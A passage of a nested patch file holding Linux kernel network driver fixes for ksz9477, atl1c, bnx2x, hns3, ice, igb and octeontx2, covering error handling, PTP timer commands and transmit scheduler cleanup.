+ 	regmap_reg_range(0x3030, 0x3030),
+ 	regmap_reg_range(0x3100, 0x3115),
+ 	regmap_reg_range(0x311a, 0x311f),
+-	regmap_reg_range(0x3122, 0x3127),
+-	regmap_reg_range(0x312a, 0x312b),
+-	regmap_reg_range(0x3136, 0x3139),
+-	regmap_reg_range(0x313e, 0x313f),
++	regmap_reg_range(0x3120, 0x312b),
++	regmap_reg_range(0x3134, 0x313b),
++	regmap_reg_range(0x313c, 0x313f),
+ 	regmap_reg_range(0x3400, 0x3401),
+ 	regmap_reg_range(0x3403, 0x3403),
+ 	regmap_reg_range(0x3410, 0x3417),
+@@ -692,10 +689,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
+ 	regmap_reg_range(0x4030, 0x4030),
+ 	regmap_reg_range(0x4100, 0x4115),
+ 	regmap_reg_range(0x411a, 0x411f),
+-	regmap_reg_range(0x4122, 0x4127),
+-	regmap_reg_range(0x412a, 0x412b),
+-	regmap_reg_range(0x4136, 0x4139),
+-	regmap_reg_range(0x413e, 0x413f),
++	regmap_reg_range(0x4120, 0x412b),
++	regmap_reg_range(0x4134, 0x413b),
++	regmap_reg_range(0x413c, 0x413f),
+ 	regmap_reg_range(0x4400, 0x4401),
+ 	regmap_reg_range(0x4403, 0x4403),
+ 	regmap_reg_range(0x4410, 0x4417),
+@@ -726,10 +722,9 @@ static const struct regmap_range ksz9477_valid_regs[] = {
+ 	regmap_reg_range(0x5030, 0x5030),
+ 	regmap_reg_range(0x5100, 0x5115),
+ 	regmap_reg_range(0x511a, 0x511f),
+-	regmap_reg_range(0x5122, 0x5127),
+-	regmap_reg_range(0x512a, 0x512b),
+-	regmap_reg_range(0x5136, 0x5139),
+-	regmap_reg_range(0x513e, 0x513f),
++	regmap_reg_range(0x5120, 0x512b),
++	regmap_reg_range(0x5134, 0x513b),
++	regmap_reg_range(0x513c, 0x513f),
+ 	regmap_reg_range(0x5400, 0x5401),
+ 	regmap_reg_range(0x5403, 0x5403),
+ 	regmap_reg_range(0x5410, 0x5417),
+diff --git a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+index 40c781695d581..7762e532c6a4f 100644
+--- a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
++++ b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+@@ -2104,8 +2104,11 @@ static int atl1c_tso_csum(struct atl1c_adapter *adapter,
+ 			real_len = (((unsigned char *)ip_hdr(skb) - skb->data)
+ 					+ ntohs(ip_hdr(skb)->tot_len));
+ 
+-			if (real_len < skb->len)
+-				pskb_trim(skb, real_len);
++			if (real_len < skb->len) {
++				err = pskb_trim(skb, real_len);
++				if (err)
++					return err;
++			}
+ 
+ 			hdr_len = skb_tcp_all_headers(skb);
+ 			if (unlikely(skb->len == hdr_len)) {
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c
+index 51b1690fd0459..a1783faf4fe99 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x_main.c
+@@ -14312,11 +14312,16 @@ static void bnx2x_io_resume(struct pci_dev *pdev)
+ 	bp->fw_seq = SHMEM_RD(bp, func_mb[BP_FW_MB_IDX(bp)].drv_mb_header) &
+ 							DRV_MSG_SEQ_NUMBER_MASK;
+ 
+-	if (netif_running(dev))
+-		bnx2x_nic_load(bp, LOAD_NORMAL);
++	if (netif_running(dev)) {
++		if (bnx2x_nic_load(bp, LOAD_NORMAL)) {
++			netdev_err(bp->dev, "Error during driver initialization, try unloading/reloading the driver\n");
++			goto done;
++		}
++	}
+ 
+ 	netif_device_attach(dev);
+ 
++done:
+ 	rtnl_unlock();
+ }
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 6af2273f227c2..84ecd8b9be48c 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -10936,9 +10936,12 @@ int hclge_cfg_flowctrl(struct hclge_dev *hdev)
+ 	u32 rx_pause, tx_pause;
+ 	u8 flowctl;
+ 
+-	if (!phydev->link || !phydev->autoneg)
++	if (!phydev->link)
+ 		return 0;
+ 
++	if (!phydev->autoneg)
++		return hclge_mac_pause_setup_hw(hdev);
++
+ 	local_advertising = linkmode_adv_to_lcl_adv_t(phydev->advertising);
+ 
+ 	if (phydev->pause)
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+index 150f146fa24fb..8b40c6b4ee53e 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.c
+@@ -1549,7 +1549,7 @@ static int hclge_bp_setup_hw(struct hclge_dev *hdev, u8 tc)
+ 	return 0;
+ }
+ 
+-static int hclge_mac_pause_setup_hw(struct hclge_dev *hdev)
++int hclge_mac_pause_setup_hw(struct hclge_dev *hdev)
+ {
+ 	bool tx_en, rx_en;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
+index dd6f1fd486cf2..251e808456208 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_tm.h
+@@ -242,6 +242,7 @@ int hclge_pfc_pause_en_cfg(struct hclge_dev *hdev, u8 tx_rx_bitmap,
+ 			   u8 pfc_bitmap);
+ int hclge_mac_pause_en_cfg(struct hclge_dev *hdev, bool tx, bool rx);
+ int hclge_pause_addr_cfg(struct hclge_dev *hdev, const u8 *mac_addr);
++int hclge_mac_pause_setup_hw(struct hclge_dev *hdev);
+ void hclge_pfc_rx_stats_get(struct hclge_dev *hdev, u64 *stats);
+ void hclge_pfc_tx_stats_get(struct hclge_dev *hdev, u64 *stats);
+ int hclge_tm_qs_shaper_cfg(struct hclge_vport *vport, int max_tx_rate);
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 7a00d297be3a9..3f98781e74b28 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -1356,6 +1356,7 @@ int ice_aq_wait_for_event(struct ice_pf *pf, u16 opcode, unsigned long timeout,
+ static void ice_aq_check_events(struct ice_pf *pf, u16 opcode,
+ 				struct ice_rq_event_info *event)
+ {
++	struct ice_rq_event_info *task_ev;
+ 	struct ice_aq_task *task;
+ 	bool found = false;
+ 
+@@ -1364,15 +1365,15 @@ static void ice_aq_check_events(struct ice_pf *pf, u16 opcode,
+ 		if (task->state || task->opcode != opcode)
+ 			continue;
+ 
+-		memcpy(&task->event->desc, &event->desc, sizeof(event->desc));
+-		task->event->msg_len = event->msg_len;
++		task_ev = task->event;
++		memcpy(&task_ev->desc, &event->desc, sizeof(event->desc));
++		task_ev->msg_len = event->msg_len;
+ 
+ 		/* Only copy the data buffer if a destination was set */
+-		if (task->event->msg_buf &&
+-		    task->event->buf_len > event->buf_len) {
+-			memcpy(task->event->msg_buf, event->msg_buf,
++		if (task_ev->msg_buf && task_ev->buf_len >= event->buf_len) {
++			memcpy(task_ev->msg_buf, event->msg_buf,
+ 			       event->buf_len);
+-			task->event->buf_len = event->buf_len;
++			task_ev->buf_len = event->buf_len;
+ 		}
+ 
+ 		task->state = ICE_AQ_TASK_COMPLETE;
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c
+index 772b1f566d6ed..813acd6a4b469 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c
+@@ -131,6 +131,8 @@ static void ice_ptp_src_cmd(struct ice_hw *hw, enum ice_ptp_tmr_cmd cmd)
+ 	case READ_TIME:
+ 		cmd_val |= GLTSYN_CMD_READ_TIME;
+ 		break;
++	case ICE_PTP_NOP:
++		break;
+ 	}
+ 
+ 	wr32(hw, GLTSYN_CMD, cmd_val);
+@@ -1200,18 +1202,18 @@ ice_ptp_read_port_capture(struct ice_hw *hw, u8 port, u64 *tx_ts, u64 *rx_ts)
+ }
+ 
+ /**
+- * ice_ptp_one_port_cmd - Prepare a single PHY port for a timer command
++ * ice_ptp_write_port_cmd_e822 - Prepare a single PHY port for a timer command
+  * @hw: pointer to HW struct
+  * @port: Port to which cmd has to be sent
+  * @cmd: Command to be sent to the port
+  *
+  * Prepare the requested port for an upcoming timer sync command.
+  *
+- * Note there is no equivalent of this operation on E810, as that device
+- * always handles all external PHYs internally.
++ * Do not use this function directly. If you want to configure exactly one
++ * port, use ice_ptp_one_port_cmd() instead.
+  */
+ static int
+-ice_ptp_one_port_cmd(struct ice_hw *hw, u8 port, enum ice_ptp_tmr_cmd cmd)
++ice_ptp_write_port_cmd_e822(struct ice_hw *hw, u8 port, enum ice_ptp_tmr_cmd cmd)
+ {
+ 	u32 cmd_val, val;
+ 	u8 tmr_idx;
+@@ -1235,6 +1237,8 @@ ice_ptp_one_port_cmd(struct ice_hw *hw, u8 port, enum ice_ptp_tmr_cmd cmd)
+ 	case ADJ_TIME_AT_TIME:
+ 		cmd_val |= PHY_CMD_ADJ_TIME_AT_TIME;
+ 		break;
++	case ICE_PTP_NOP:
++		break;
+ 	}
+ 
+ 	/* Tx case */
+@@ -1280,6 +1284,39 @@ ice_ptp_one_port_cmd(struct ice_hw *hw, u8 port, enum ice_ptp_tmr_cmd cmd)
+ 	return 0;
+ }
+ 
++/**
++ * ice_ptp_one_port_cmd - Prepare one port for a timer command
++ * @hw: pointer to the HW struct
++ * @configured_port: the port to configure with configured_cmd
++ * @configured_cmd: timer command to prepare on the configured_port
++ *
++ * Prepare the configured_port for the configured_cmd, and prepare all other
++ * ports for ICE_PTP_NOP. This causes the configured_port to execute the
++ * desired command while all other ports perform no operation.
++ */
++static int
++ice_ptp_one_port_cmd(struct ice_hw *hw, u8 configured_port,
++		     enum ice_ptp_tmr_cmd configured_cmd)
++{
++	u8 port;
++
++	for (port = 0; port < ICE_NUM_EXTERNAL_PORTS; port++) {
++		enum ice_ptp_tmr_cmd cmd;
++		int err;
++
++		if (port == configured_port)
++			cmd = configured_cmd;
++		else
++			cmd = ICE_PTP_NOP;
++
++		err = ice_ptp_write_port_cmd_e822(hw, port, cmd);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
+ /**
+  * ice_ptp_port_cmd_e822 - Prepare all ports for a timer command
+  * @hw: pointer to the HW struct
+@@ -1296,7 +1333,7 @@ ice_ptp_port_cmd_e822(struct ice_hw *hw, enum ice_ptp_tmr_cmd cmd)
+ 	for (port = 0; port < ICE_NUM_EXTERNAL_PORTS; port++) {
+ 		int err;
+ 
+-		err = ice_ptp_one_port_cmd(hw, port, cmd);
++		err = ice_ptp_write_port_cmd_e822(hw, port, cmd);
+ 		if (err)
+ 			return err;
+ 	}
+@@ -2245,6 +2282,9 @@ static int ice_sync_phy_timer_e822(struct ice_hw *hw, u8 port)
+ 	if (err)
+ 		goto err_unlock;
+ 
++	/* Do not perform any action on the main timer */
++	ice_ptp_src_cmd(hw, ICE_PTP_NOP);
++
+ 	/* Issue the sync to activate the time adjustment */
+ 	ice_ptp_exec_tmr_cmd(hw);
+ 
+@@ -2371,6 +2411,9 @@ ice_start_phy_timer_e822(struct ice_hw *hw, u8 port, bool bypass)
+ 	if (err)
+ 		return err;
+ 
++	/* Do not perform any action on the main timer */
++	ice_ptp_src_cmd(hw, ICE_PTP_NOP);
++
+ 	ice_ptp_exec_tmr_cmd(hw);
+ 
+ 	err = ice_read_phy_reg_e822(hw, port, P_REG_PS, &val);
+@@ -2914,6 +2957,8 @@ static int ice_ptp_port_cmd_e810(struct ice_hw *hw, enum ice_ptp_tmr_cmd cmd)
+ 	case ADJ_TIME_AT_TIME:
+ 		cmd_val = GLTSYN_CMD_ADJ_INIT_TIME;
+ 		break;
++	case ICE_PTP_NOP:
++		return 0;
+ 	}
+ 
+ 	/* Read, modify, write */
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.h b/drivers/net/ethernet/intel/ice/ice_ptp_hw.h
+index 2bda64c76abc3..071f545aa85e8 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.h
++++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.h
+@@ -9,7 +9,8 @@ enum ice_ptp_tmr_cmd {
+ 	INIT_INCVAL,
+ 	ADJ_TIME,
+ 	ADJ_TIME_AT_TIME,
+-	READ_TIME
++	READ_TIME,
++	ICE_PTP_NOP,
+ };
+ 
+ enum ice_ptp_serdes {
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index 3e0444354632d..d0ead18ec0266 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -4758,6 +4758,10 @@ void igb_configure_rx_ring(struct igb_adapter *adapter,
+ static void igb_set_rx_buffer_len(struct igb_adapter *adapter,
+ 				  struct igb_ring *rx_ring)
+ {
++#if (PAGE_SIZE < 8192)
++	struct e1000_hw *hw = &adapter->hw;
++#endif
++
+ 	/* set build_skb and buffer size flags */
+ 	clear_ring_build_skb_enabled(rx_ring);
+ 	clear_ring_uses_large_buffer(rx_ring);
+@@ -4768,10 +4772,9 @@ static void igb_set_rx_buffer_len(struct igb_adapter *adapter,
+ 	set_ring_build_skb_enabled(rx_ring);
+ 
+ #if (PAGE_SIZE < 8192)
+-	if (adapter->max_frame_size <= IGB_MAX_FRAME_BUILD_SKB)
+-		return;
+-
+-	set_ring_uses_large_buffer(rx_ring);
++	if (adapter->max_frame_size > IGB_MAX_FRAME_BUILD_SKB ||
++	    rd32(E1000_RCTL) & E1000_RCTL_SBP)
++		set_ring_uses_large_buffer(rx_ring);
+ #endif
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 5541e284cd3f0..c85e0180d96da 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -1691,6 +1691,42 @@ exit:
+ 	return true;
+ }
+ 
++static void nix_reset_tx_schedule(struct rvu *rvu, int blkaddr,
++				  int lvl, int schq)
++{
++	u64 tlx_parent = 0, tlx_schedule = 0;
++
++	switch (lvl) {
++	case NIX_TXSCH_LVL_TL2:
++		tlx_parent   = NIX_AF_TL2X_PARENT(schq);
++		tlx_schedule = NIX_AF_TL2X_SCHEDULE(schq);
++		break;
++	case NIX_TXSCH_LVL_TL3:
++		tlx_parent   = NIX_AF_TL3X_PARENT(schq);
++		tlx_schedule = NIX_AF_TL3X_SCHEDULE(schq);
++		break;
++	case NIX_TXSCH_LVL_TL4:
++		tlx_parent   = NIX_AF_TL4X_PARENT(schq);
++		tlx_schedule = NIX_AF_TL4X_SCHEDULE(schq);
++		break;
++	case NIX_TXSCH_LVL_MDQ:
++		/* no need to reset SMQ_CFG as HW clears this CSR
++		 * on SMQ flush
++		 */
++		tlx_parent   = NIX_AF_MDQX_PARENT(schq);
++		tlx_schedule = NIX_AF_MDQX_SCHEDULE(schq);
++		break;
++	default:
++		return;
++	}
++
++	if (tlx_parent)
++		rvu_write64(rvu, blkaddr, tlx_parent, 0x0);
++
++	if (tlx_schedule)
++		rvu_write64(rvu, blkaddr, tlx_schedule, 0x0);
++}
++
+ /* Disable shaping of pkts by a scheduler queue
+  * at a given scheduler level.
+  */
+@@ -2040,6 +2076,7 @@ int rvu_mbox_handler_nix_txsch_alloc(struct rvu *rvu,
+ 				pfvf_map[schq] = TXSCH_MAP(pcifunc, 0);
+ 			nix_reset_tx_linkcfg(rvu, blkaddr, lvl, schq);
+ 			nix_reset_tx_shaping(rvu, blkaddr, nixlf, lvl, schq);
++			nix_reset_tx_schedule(rvu, blkaddr, lvl, schq);
+ 		}
+ 
+ 		for (idx = 0; idx < req->schq[lvl]; idx++) {
+@@ -2049,6 +2086,7 @@ int rvu_mbox_handler_nix_txsch_alloc(struct rvu *rvu,
+ 				pfvf_map[schq] = TXSCH_MAP(pcifunc, 0);
+ 			nix_reset_tx_linkcfg(rvu, blkaddr, lvl, schq);
+ 			nix_reset_tx_shaping(rvu, blkaddr, nixlf, lvl, schq);
++			nix_reset_tx_schedule(rvu, blkaddr, lvl, schq);
+ 		}
+ 	}
+ 
+@@ -2137,6 +2175,7 @@ static int nix_txschq_free(struct rvu *rvu, u16 pcifunc)
+ 				continue;
+ 			nix_reset_tx_linkcfg(rvu, blkaddr, lvl, schq);
+ 			nix_clear_tx_xoff(rvu, blkaddr, lvl, schq);
++			nix_reset_tx_shaping(rvu, blkaddr, nixlf, lvl, schq);
+ 		}
+ 	}
+ 	nix_clear_tx_xoff(rvu, blkaddr, NIX_TXSCH_LVL_TL1,
+@@ -2175,6 +2214,7 @@ static int nix_txschq_free(struct rvu *rvu, u16 pcifunc)
+ 		for (schq = 0; schq < txsch->schq.max; schq++) {
+ 			if (TXSCH_MAP_FUNC(txsch->pfvf_map[schq]) != pcifunc)
+ 				continue;
++			nix_reset_tx_schedule(rvu, blkaddr, lvl, schq);
+ 			rvu_free_rsrc(&txsch->schq, schq);
+ 			txsch->pfvf_map[schq] = TXSCH_MAP(0, NIX_TXSCHQ_FREE);
+ 		}
+@@ -2234,6 +2274,9 @@ static int nix_txschq_free_one(struct rvu *rvu,
+ 	 */
+ 	nix_clear_tx_xoff(rvu, blkaddr, lvl, schq);
+ 
++	nix_reset_tx_linkcfg(rvu, blkaddr, lvl, schq);
++	nix_reset_tx_shaping(rvu, blkaddr, nixlf, lvl, schq);
++
+ 	/* Flush if it is a SMQ. Onus of disabling
+ 	 * TL2/3 queue links before SMQ flush is on user
+ 	 */
+@@ -2243,6 +2286,8 @@ static int nix_txschq_free_one(struct rvu *rvu,
+ 		goto err;
+ 	}
+ 
++	nix_reset_tx_schedule(rvu, blkaddr, lvl, schq);
++
+ 	/* Free the resource */
+ 	rvu_free_rsrc(&txsch->schq, schq);
+ 	txsch->pfvf_map[schq] = TXSCH_MAP(0, NIX_TXSCHQ_FREE);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+index 8a41ad8ca04f1..011355e73696e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.c
+@@ -716,7 +716,8 @@ EXPORT_SYMBOL(otx2_smq_flush);
+ int otx2_txsch_alloc(struct otx2_nic *pfvf)
+ {
+ 	struct nix_txsch_alloc_req *req;
+-	int lvl;
++	struct nix_txsch_alloc_rsp *rsp;
++	int lvl, schq, rc;
+ 
+ 	/* Get memory to put this msg */
+ 	req = otx2_mbox_alloc_msg_nix_txsch_alloc(&pfvf->mbox);
+@@ -726,33 +727,69 @@ int otx2_txsch_alloc(struct otx2_nic *pfvf)
+ 	/* Request one schq per level */
+ 	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++)
+ 		req->schq[lvl] = 1;
++	rc = otx2_sync_mbox_msg(&pfvf->mbox);
++	if (rc)
++		return rc;
+ 
+-	return otx2_sync_mbox_msg(&pfvf->mbox);
++	rsp = (struct nix_txsch_alloc_rsp *)
++	      otx2_mbox_get_rsp(&pfvf->mbox.mbox, 0, &req->hdr);
++	if (IS_ERR(rsp))
++		return PTR_ERR(rsp);
++
++	/* Setup transmit scheduler list */
++	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++)
++		for (schq = 0; schq < rsp->schq[lvl]; schq++)
++			pfvf->hw.txschq_list[lvl][schq] =
++				rsp->schq_list[lvl][schq];
++
++	pfvf->hw.txschq_link_cfg_lvl = rsp->link_cfg_lvl;
++
++	return 0;
+ }
+ 
+-int otx2_txschq_stop(struct otx2_nic *pfvf)
++void otx2_txschq_free_one(struct otx2_nic *pfvf, u16 lvl, u16 schq)
+ {
+ 	struct nix_txsch_free_req *free_req;
+-	int lvl, schq, err;
++	int err;
+ 
+ 	mutex_lock(&pfvf->mbox.lock);
+-	/* Free the transmit schedulers */
++
+ 	free_req = otx2_mbox_alloc_msg_nix_txsch_free(&pfvf->mbox);
+ 	if (!free_req) {
+ 		mutex_unlock(&pfvf->mbox.lock);
+-		return -ENOMEM;
++		netdev_err(pfvf->netdev,
++			   "Failed alloc txschq free req\n");
++		return;
+ 	}
+ 
+-	free_req->flags = TXSCHQ_FREE_ALL;
++	free_req->schq_lvl = lvl;
++	free_req->schq = schq;
++
+ 	err = otx2_sync_mbox_msg(&pfvf->mbox);
++	if (err) {
++		netdev_err(pfvf->netdev,
++			   "Failed stop txschq %d at level %d\n", schq, lvl);
++	}
++
+ 	mutex_unlock(&pfvf->mbox.lock);
++}
++EXPORT_SYMBOL(otx2_txschq_free_one);
++
++void otx2_txschq_stop(struct otx2_nic *pfvf)
++{
++	int lvl, schq;
++
++	/* free non QOS TLx nodes */
++	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++)
++		otx2_txschq_free_one(pfvf, lvl,
++				     pfvf->hw.txschq_list[lvl][0]);
+ 
+ 	/* Clear the txschq list */
+ 	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++) {
+ 		for (schq = 0; schq < MAX_TXSCHQ_PER_FUNC; schq++)
+ 			pfvf->hw.txschq_list[lvl][schq] = 0;
+ 	}
+-	return err;
++
+ }
+ 
+ void otx2_sqb_flush(struct otx2_nic *pfvf)
+@@ -1629,21 +1666,6 @@ void mbox_handler_cgx_fec_stats(struct otx2_nic *pfvf,
+ 	pfvf->hw.cgx_fec_uncorr_blks += rsp->fec_uncorr_blks;
+ }
+ 
+-void mbox_handler_nix_txsch_alloc(struct otx2_nic *pf,
+-				  struct nix_txsch_alloc_rsp *rsp)
+-{
+-	int lvl, schq;
+-
+-	/* Setup transmit scheduler list */
+-	for (lvl = 0; lvl < NIX_TXSCH_LVL_CNT; lvl++)
+-		for (schq = 0; schq < rsp->schq[lvl]; schq++)
+-			pf->hw.txschq_list[lvl][schq] =
+-				rsp->schq_list[lvl][schq];
+-
+-	pf->hw.txschq_link_cfg_lvl = rsp->link_cfg_lvl;
+-}
+-EXPORT_SYMBOL(mbox_handler_nix_txsch_alloc);
+-
+ void mbox_handler_npa_lf_alloc(struct otx2_nic *pfvf,
+ 			       struct npa_lf_alloc_rsp *rsp)
+ {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 241016ca64d05..8a9793b06769f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -917,7 +917,8 @@ int otx2_config_nix(struct otx2_nic *pfvf);
+ int otx2_config_nix_queues(struct otx2_nic *pfvf);
+ int otx2_txschq_config(struct otx2_nic *pfvf, int lvl, int prio, bool pfc_en);
+ int otx2_txsch_alloc(struct otx2_nic *pfvf);
+-int otx2_txschq_stop(struct otx2_nic *pfvf);
++void otx2_txschq_stop(struct otx2_nic *pfvf);
++void otx2_txschq_free_one(struct otx2_nic *pfvf, u16 lvl, u16 schq);
+ void otx2_sqb_flush(struct otx2_nic *pfvf);
+ int __otx2_alloc_rbuf(struct otx2_nic *pfvf, struct otx2_pool *pool,
+ 		      dma_addr_t *dma);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
+index ccaf97bb1ce03..bfddbff7bcdfb 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_dcbnl.c
+@@ -70,7 +70,7 @@ static int otx2_pfc_txschq_alloc_one(struct otx2_nic *pfvf, u8 prio)
+ 	 * link config level. These rest of the scheduler can be
+ 	 * same as hw.txschq_list.
+ 	 */
+-	for (lvl = 0; lvl < pfvf->hw.txschq_link_cfg_lvl; lvl++)
++	for (lvl = 0; lvl <= pfvf->hw.txschq_link_cfg_lvl; lvl++)
+ 		req->schq[lvl] = 1;
+ 
+ 	rc = otx2_sync_mbox_msg(&pfvf->mbox);
+@@ -83,7 +83,7 @@ static int otx2_pfc_txschq_alloc_one(struct otx2_nic *pfvf, u8 prio)
+ 		return PTR_ERR(rsp);
+ 
+ 	/* Setup transmit scheduler list */
+-	for (lvl = 0; lvl < pfvf->hw.txschq_link_cfg_lvl; lvl++) {
++	for (lvl = 0; lvl <= pfvf->hw.txschq_link_cfg_lvl; lvl++) {
+ 		if (!rsp->schq[lvl])
+ 			return -ENOSPC;
+ 
+@@ -125,19 +125,12 @@ int otx2_pfc_txschq_alloc(struct otx2_nic *pfvf)
+ 
+ static int otx2_pfc_txschq_stop_one(struct otx2_nic *pfvf, u8 prio)
+ {
+-	struct nix_txsch_free_req *free_req;
++	int lvl;
+ 
+-	mutex_lock(&pfvf->mbox.lock);
+ 	/* free PFC TLx nodes */
+-	free_req = otx2_mbox_alloc_msg_nix_txsch_free(&pfvf->mbox);
+-	if (!free_req) {
+-		mutex_unlock(&pfvf->mbox.lock);
+-		return -ENOMEM;
+-	}
+-
+-	free_req->flags = TXSCHQ_FREE_ALL;
+-	otx2_sync_mbox_msg(&pfvf->mbox);
+-	mutex_unlock(&pfvf->mbox.lock);
++	for (lvl = 0; lvl <= pfvf->hw.txschq_link_cfg_lvl; lvl++)
++		otx2_txschq_free_one(pfvf, lvl,
++				     pfvf->pfc_schq_list[lvl][prio]);
+ 
+ 	pfvf->pfc_alloc_status[prio] = false;
+ 	return 0;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index c236dba80ff1a..17e546d0d7e55 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -791,10 +791,6 @@ static void otx2_process_pfaf_mbox_msg(struct otx2_nic *pf,
+ 	case MBOX_MSG_NIX_LF_ALLOC:
+ 		mbox_handler_nix_lf_alloc(pf, (struct nix_lf_alloc_rsp *)msg);
+ 		break;
+-	case MBOX_MSG_NIX_TXSCH_ALLOC:
+-		mbox_handler_nix_txsch_alloc(pf,
+-					     (struct nix_txsch_alloc_rsp *)msg);
+-		break;
+ 	case MBOX_MSG_NIX_BP_ENABLE:
+ 		mbox_handler_nix_bp_enable(pf, (struct nix_bp_cfg_rsp *)msg);
+ 		break;
+@@ -1517,8 +1513,7 @@ err_free_nix_queues:
+ 	otx2_free_cq_res(pf);
+ 	otx2_ctx_disable(mbox, NIX_AQ_CTYPE_RQ, false);
+ err_free_txsch:
+-	if (otx2_txschq_stop(pf))
+-		dev_err(pf->dev, "%s failed to stop TX schedulers\n", __func__);
++	otx2_txschq_stop(pf);
+ err_free_sq_ptrs:
+ 	otx2_sq_free_sqbs(pf);
+ err_free_rq_ptrs:
+@@ -1553,15 +1548,13 @@ static void otx2_free_hw_resources(struct otx2_nic *pf)
+ 	struct mbox *mbox = &pf->mbox;
+ 	struct otx2_cq_queue *cq;
+ 	struct msg_req *req;
+-	int qidx, err;
++	int qidx;
+ 
+ 	/* Ensure all SQE are processed */
+ 	otx2_sqb_flush(pf);
+ 
+ 	/* Stop transmission */
+-	err = otx2_txschq_stop(pf);
+-	if (err)
+-		dev_err(pf->dev, "RVUPF: Failed to stop/free TX schedulers\n");
++	otx2_txschq_stop(pf);
+ 
+ #ifdef CONFIG_DCB
+ 	if (pf->pfc_en)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 53366dbfbf27c..f8f0c01f62a14 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -70,10 +70,6 @@ static void otx2vf_process_vfaf_mbox_msg(struct otx2_nic *vf,
+ 	case MBOX_MSG_NIX_LF_ALLOC:
+ 		mbox_handler_nix_lf_alloc(vf, (struct nix_lf_alloc_rsp *)msg);
+ 		break;
+-	case MBOX_MSG_NIX_TXSCH_ALLOC:
+-		mbox_handler_nix_txsch_alloc(vf,
+-					     (struct nix_txsch_alloc_rsp *)msg);
+-		break;
+ 	case MBOX_MSG_NIX_BP_ENABLE:
+ 		mbox_handler_nix_bp_enable(vf, (struct nix_bp_cfg_rsp *)msg);
+ 		break;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+index d219f8417d93a..dec1492da74de 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c
+@@ -319,16 +319,11 @@ static int mlx5_pci_link_toggle(struct mlx5_core_dev *dev)
